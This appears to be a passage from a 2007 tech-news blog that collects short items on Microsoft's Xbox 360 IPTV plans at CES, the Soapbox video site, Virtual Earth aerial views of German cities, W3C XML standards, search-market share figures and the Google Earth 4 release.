Ed Graczyk, Worldwide Director of Marketing and Communications for Microsoft TV will demonstrate the service during his keynote at the conference, specifically showcasing what happens when "next-generation television is combined with next-generation gaming in a unique, new service delivered by your broadband provider".

IPTV is expected to be available as early as Christmas 2007 in Europe, and telecom providers BT, Deutsche Telekom and T-Online in France have already chosen Microsoft IPTV Edition as their IPTV software choice.
[/QUOTE]

More at computerandvideogames.com.

[QUOTE]
Microsoft Corp. (NASDAQ:MSFT) chairman Bill Gates unveiled a slew of new products and content partners Sunday in his keynote address kicking off the 2007 International Consumer Electronics Show, vowing to deliver access to video and data no matter where the consumer might be.

"It's a dream if you're a sports fan or there's a sports fan in your house," said Robbie Bach, president of Microsoft's entertainment and devices division and the company's chief liaison to Hollywood. Bach and Gates alternated introducing new products during Microsoft's CES presentation.

In addition, Microsoft said that it has signed Lionsgate (NYSE:LGF) to its roster of programming contributors to Xbox 360 Live Marketplace, joining Paramount and Warner Bros. Bach hailed the addition of a library of video content to Xbox Live that either can be streamed or downloaded, noting that 100 million downloads of games, TV episodes and movies have been generated over the past 13 months; he did not offer a separate account of how video alone has fared since Microsoft signed content partners including ABC, Comedy Central and the CW as of Nov. 22. Xbox 360 also will provide an IPTV service that can deliver video programming, essentially functioning as a set-top box.

Although that doesn't put Microsoft in the video distribution business, it opens up the possibility that the company could partner with AT&T (NYSE:SBT) (NYSE:T) to offer a mix of voice, video, data and wireless. Microsoft already provides software for AT&T's IP-based rollout, raising the specter that the telco's current U.S. service, U-Verse, could eventually be bundled with Xbox 360.

IPTV video has DVR and video-on-demand functionality and also will enable seamless switching between video programming and games, and even blur the two, demonstrating functionality that allowed a community of users to talk to their Xbox even while its in TV mode.
[/QUOTE]

Full Story: money.cnn.com

Microsoft unleashed its Soapbox Web video platform (its YouTube competitor) to the unwashed masses yesterday, taking the service out of private beta. The service has a clean and simple layout, and manages to keep both the MSN moniker and the often-clunky Windows Live Login (formerly .NET Passport). What baffles me about this is that despite having access to all your personal information, Soapbox won't parse your Windows Live ID to fill in simple profile information like your name and location, unless you've recently gone through and updated it since opening a Hotmail account in the 90s. Nor will it go through your Windows Live e-mail to see if you want to share any videos that have been sent to you by friends. If Microsoft is aiming for no-nonsense integration with its Web services, it's sadly not there yet.

That being said, Microsoft did add the ability to post videos in your blog, which was one of the original Soapbox criticisms. The catch is that it has to be a Windows Live Spaces blog. Alternatively, there are the standard permalinks and embed codes for you to send to friends or put on your blog or Web site.

Below I've embedded one of my favorite videos. Note the fact you can access both share codes and description from the player itself. Neat.

Video: Amazingly Cool Ad

Luftbildaufnahmen mit hohem Detailgrad für fünf Dutzend Städte

Der Kartendienst "Virtual Earth" von Microsoft hat mit dem Werkzeug "Bird’s Eye View" eine deutliche Verbesserung erfahren. Aus der Vogelperspektive können rund fünf Dutzend deutscher Städte von oben betrachtet werden. Anstelle von Satellitenaufnahmen, wie sie vom Konkurrenten Google Earth verwendet werden, kommen bei der Bird's Eye View von Virtual Earth Luftbildaufnahmen zum Einsatz.

Die folgende Städte lassen sich aus der Vogelperspektive überfliegen:
Aalen, Aschaffenburg, Augsburg, Baden-Baden, Bamberg, Bayreuth, Binz, Brandenburg, Chemnitz, Cottbus, Dessau, Dresden, Erfurt, Erlangen, Freiburg im Breisgau, Gera, Göppingen, Görlitz, Halle, Hanau, Heilbronn, Ingolstadt, Jena, Karlsruhe, Kempten (Allgäu), Konstanz, Landshut, Leipzig, Lübeck, Ludwigsburg, Magdeburg, Mannheim, München, Neumünster, Nürnberg und Fürth, Offenburg, Pforzheim, Plauen, Potsdam, Reutlingen, Rosenheim, Rostock, Saarbrücken, Sassnitz, Schwäbisch Gmünd, Sindelfingen, Speyer, Stralsund, Stuttgart, Trier, Tübingen, Ulm, Villingen-Schwenningen, Waiblingen, Weimar, Wolfsburg und Würzburg.

Die Aufnahmen wurden im Sommer 2006 gemacht. Die ausgewählten Standorte lassen sich per direkte URL weitergeben. Der Kartendienst ist online unter maps.live.com zu finden.

Mehr Info's: http://www.golem.de/0702/50579.html

The World Wide Web Consortium (W3C) this week announced it has published eight standards in its XML family to support the ability to query and transform XML data and documents.

Primary specifications include XQuery 1.0: An XML query language; Extensible Stylesheet Language Transformations (XSLT) 2.0 and XML Path Language (XPath) 2.0.

The new standards will play a role in enterprise computing by connecting databases with the Web, W3C said. XQuery provides for data mining while XSLT 2.0 boosts functionality in XSLT, which enables transformation and styled presentation of XML documents. These two specifications are dependent on XPath 2.0.

XPath 2.0 is an expression language allowing processing of values conformining to the data model defined in XQuery/XPath Data Model (XDM). The model provides a tree representation of XML documents and atomic values such as integers and strings. Version 2.0 supports a richer set of data types than the 1.0 version.

"XQuery will serve as a unifying interface for access to XML data, much as SQL has done for relational data," said Don Chamberlin of IBM Almaden Research Center, co-inventor of the original SQL query language and a co-editor of XQuery 1.0, in a statement released by W3C.

In addition to the primary specifications published this week, others include:

* XML Syntax for XQuery 1.0 (XQueryX).
* XDM.
* XQuery 1.0 and XPath 2.0 Functions and Operators.
* XQuery 1.0 and XPath 2.0 Formal Semantics.
* XSLT 2.0 and XQuery 1.0 Serialization.

[QUOTE]
RESTON, Va., January 15, 2006 – comScore Networks today released its monthly qSearch analysis of activity across competitive search engines. In December 2006, Google Sites captured 47.3 percent of the U.S. search market, gaining 0.4 share points from the previous month. Yahoo! Sites grew 0.3 share points, maintaining its second place ranking with 28.5 percent of U.S. searches, followed by Microsoft Sites (10.5 percent), Ask Network (5.4 percent) and Time Warner Network (4.9 percent).

Share of Online Searches by Engine November 2006 - December 2006 Total U.S. Home, Work and University Internet Users Source: comScore qSearch
	Nov-06	Dec-06	Pt Chg vs. Previous Month
Total Internet Population	100%	100%	N/A
Google Sites	46.9	47.3	0.4
Yahoo! Sites	28.2	28.5	0.3
Microsoft Sites	11.0	10.5	-0.5
Ask Network	5.5	5.4	-0.1
Time Warner Network	5.1	4.9	-0.2

• Americans conducted 6.7 billion searches online in December, up 1 percent versus November. Annual growth rates in search query volume remained strong with a 30-percent increase since the same month a year ago.

• Google Sites led the pack with 3.2 billion search queries performed, followed by Yahoo Sites (1.9 billion), MSN-Microsoft (713 million), Ask Network (363 million), and Time Warner Network (335 million).
[/QUOTE]

Blogger Robert Basic ist der Frage nachgegangen, wie viel Geld mit Blogs direkt verdient wird und wie sich diese Einnahmen zusammensetzen. Daten von 47 Blogs wurde zur Verfügung gestellt, die Ergebnisse nun in einer Zusammenfassung veröffentlicht. Im Schnitt kommen die Blogger auf 213,- US-Dollar pro Monat.

 

Das Ergebnis veröffentlichte Basic nun in seinem Blog.

Google Earth 4 is officially released! The beta program began 6 months ago, and now almost exactly 1 year after GE 3 was released, GE 4 is no longer in beta (latest version is 4.0.2722). See the Google Earth home page for details, or just go download GE 4 now. GE 4 has many new features not available in the earlier version. 

New Google Earth 4 features:

• 3D Models - GE 4 supports a new format which allows for models which have textures. It also supports the new 3D buildings layer. The official release of GE includes lots of optimizations to improve 3D viewing.
• Time Animation - the new time slider appears when KML content has been stamped with time. Read about the new time feature. And, here is a list of the top ten time animations done in 2006 for GE 4.
• New Look - GE 4 has a much cleaner look than GE 3. It devotes more attention to the main 3D view, and has a new navigation gadget which appears in the upper right corner. There are too many enhancements to list them all. Some notable ones are: Support for radio buttons in KML, network link icons animate when loading, new organized menus, and more GE Options.
• Controllers - Support for joystick controllers and flight simulator yokes. And, best of all, the new SpaceNavigator (Windows only at the moment, but a Mac driver soon).
• Regions - GE 4 supports very large image overlays which can be "tiled" or "regionated" so you can view the full detail as you zoom in. See the "Rumsey Historical Maps" in the "Featured Content" layer for an excellent example of this powerful feature.

Google Earth related surf tips: www.gearthblog.com, www.googleearthhacks.com, bbs.keyhole.com, www.worlswindcentral.com

The Consumer Electronics Show Conference is over now.

Here's a video of the CES Keynote that was quickly encoded and uploaded to google video.

 

It's the complete keynote (over 1 hour, which includes Bill Gates Keynote and a part hosted by Robbie Bach from Microsoft's Entertainment Division, who tells you everything about the Xbox360 including the IPTV demo toward the end of the video).

Microsoft will release a high-quality video of the complete keynote very soon here.

Engadget has some high-res pictures of the Xbox360 IPTV interface.

Xbox-Scene has 2 press releases and a LIVE coverage of Bill Gates' Keynote at CES 2007.

Top Suchbegriffe 2006